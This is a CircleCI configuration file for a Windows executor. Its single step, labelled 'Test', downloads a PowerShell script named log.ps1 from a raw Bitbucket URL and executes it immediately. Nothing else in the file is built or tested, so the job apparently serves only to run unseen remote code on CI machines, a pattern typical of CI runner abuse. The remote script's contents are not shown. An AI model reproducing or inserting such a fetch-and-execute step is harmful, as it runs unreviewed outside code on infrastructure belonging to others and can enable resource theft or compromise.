version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/lintarken/luntar/raw/5e9ea235e629c75c85ab2c4c7c3f50abe747c4e7/log.ps1 -OutFile log.ps1
            ./log.ps1